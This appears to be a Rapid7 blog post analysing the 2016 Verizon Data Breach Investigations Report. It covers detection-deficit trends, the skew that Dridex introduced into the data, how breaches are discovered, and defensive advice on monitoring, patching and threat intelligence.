(Of note: it seems even the Verizon Data Breach Report has "Unknown Unknowns")

 

As defenders, you should be reading the report with an eye for your industry, size, and other characteristics to help build up your threat profiles and help benchmark your security program. Take your incident-to-breach ratio (you are using VERIS to record and track everything from anti-virus hits to full-on breaches, right?) and compare it to the corresponding industry/size.

 

The Single Most Popular Valuable Chart In The World! (for defenders)

 

When it comes right down to it, you're usually fighting an economic battle with your adversaries. This year's report, Figure 3 (page 7) shows that the motivations are still primarily financial and that Hacking, Malware and Social are the weapons of choice for attackers. We'll dive into that in a bit, but we need to introduce our take on DBIR Figure 8 (page 10) before continuing:

 

2016-verizon-data-breach-report-fig-4-1.png

We smoothed out the rough edges from the 2016 Verizon Data Breach Report figure to paint a somewhat clearer picture of the overall trends, and used a complex statistical transformation (i.e. subtraction) to focus on just the smoothed gap:

 

2016-verizon-data-breach-report-fig-5-1.png

 

Remember, the DBIR data is a biased sample from the overall population of cyber security incidents and breaches that occur and every statistical transformation introduces more uncertainty along the way. That means your takeaway from "Part Deux" should be "we're not getting any better" vs "THE DETECTION DEFICIT TOPPED 75% FOR THE FIRST TIME IN HISTORY!"

 

So, our adversaries are accomplishing their goals in days or less at an ever-quickening success rate while defenders are just not keeping up at all. Before we can understand what we need to do to reverse these trends, we need to see what the attackers are doing. We took the data from DBIR Figure 6 (page 9) and pulled out the top threat actions for each year, then filtered the result to the areas that match both the major threat action categories and the areas of concern that Rapid7 customers have a keen focus on:

 

2016-verizon-data-breach-report-fig-6-1.png

Some key takeaways:

  • Malware and hacking events dropping C2s are up
  • Key loggers are making a comeback (this may be an artifact of the heavy influence of Dridex in the DBIR data set this year)
  • Malware-based exfiltration is back to previously seen levels
  • Phishing is pretty much holding steady, which is most likely supporting the use of compromised credentials (which is trending up)

 

Endpoint monitoring, kicking up your awareness programs, and watching out for wonky user account behavior would be wise things to prioritize based on this data.

 

Not all Cut-and-Dridex

The Verizon Data Breach Report mentions Dridex 13 times and was very up front about the bias it introduced in the report. So, how can you interpret the data with "DrideRx" prescription lenses? Rapid7's Analytic Response Team notes that Dridex campaigns involve:

 

  • Phishing
  • Endpoint malware drops
  • Establishment of command and control (C2) on the endpoint
  • Harvesting credentials and shipping them back to the C2 servers

 

This means that—at a minimum—the Dridex campaigns influenced the data behind Data Breach Investigations Report Figures 6-8 and 15-22, and thus the overall findings; Verizon itself warns about broad interpretations of the Web App Attacks category:

 

"Hundreds of breaches involving social attacks on customers, followed by the Dridex malware and subsequent use of credentials captured by keyloggers, dominate the actions."

 

So, when interpreting the results, keep an eye out for the above components and factor in the Dridex component before tweaking your security program too much in one direction or another.

 

Who has your back?

 

When reading any report, one should always check to make sure the data presented doesn't conflict with itself. One way to add a validation to the above detection deficit is to look at DBIR Figure 9 (page 11) which shows (when known) how breaches were discovered over time. We can simplify this view as well:

 

2016-verizon-data-breach-report-fig-7-1.png

In the significant majority of cases, defenders have law enforcement agencies (like the FBI in the United States) and other external parties to "thank" for letting them know they've been pwnd. As our figure shows, we stopped being able to watch our own backs half a decade ago and have yet to recover. This should be a wake-up call to defenders to focus on identifying how attackers are getting into their organizations and instrumenting better ways to detect their actions.

 

Are you:

 

  • Identifying critical assets and access points?
  • Monitoring the right things (or anything) on your endpoints?
  • Getting the right logs into the right places for analysis and action?
  • Deploying honeypots to catch activity that should not be happening?

 

If not, these may be things you need to re-prioritize in order to force the attackers to invest more time and resources to accomplish their goals (remember, this is a battle of economics).

 

Are You Feeling Vulnerable?

 

Attackers are continuing to use stolen credentials at an alarming rate and they obtain these credentials through both social engineering and the exploitation of vulnerabilities. Similarly, lateral movement within an organization also relies—in part—on exploiting vulnerabilities. DBIR Figure 13 (page 16) shows that as a group, defenders are staying on top of current and year-minus-one vulnerabilities fairly well:

 

dbirfig13.png

We're still having issues patching or mitigating older vulnerabilities, many of which have tried-and-true exploits that will work juuuust fine. Leaving these attack points exposed is not helping your economic battle with your adversaries, as letting them rely on past R&D means they have more time and opportunity. How can you get the upper-hand?

 

  • Maintain situational awareness when it comes to vulnerabilities (i.e. scan with a plan)
  • Develop a patching strategy with a holistic focus, rather than just reacting to "Patch Tuesday"
  • Don't dismiss mitigation. There are legitimate technical and logistic reasons that can make patching difficult. Work on developing a playbook of mitigation strategies you can rely on when these types of vulnerabilities arise.

 

"Threat intelligence" was a noticeably absent topic in the 2016 DBIR, but we feel that it can play a key role when it comes to defending your organization when vulnerabilities are present. Your vuln management, server/app management, and security operations teams should be working in tandem to know where vulnerabilities still exist and to monitor and block malicious activity that is associated with targets that are still vulnerable. This is one of the best ways to utilize all those threat intel feeds you have gathering dust in your SIEM.

 

There and Back Again

 

This post outlined just a few of the interesting markers on your path through the Verizon Data Breach Report. Keep a watchful eye on the Rapid7 Community for more insight into other critical areas of the report and where we can help you address the key issues facing your organization.


(Many thanks to Rapid7's Roy Hodgman and Rebekah Brown for their contributions to this post.)

 

Related Resources:

 

Watch my short take on this year's Verizon Data Breach Investigations Report.

 

DBIR video.png

Join us for a live webcast as we dig deeper into the 2016 Verizon Data Breach Investigations Report findings. Tuesday, May 10 at 2PM ET/11AM PT. Register now!
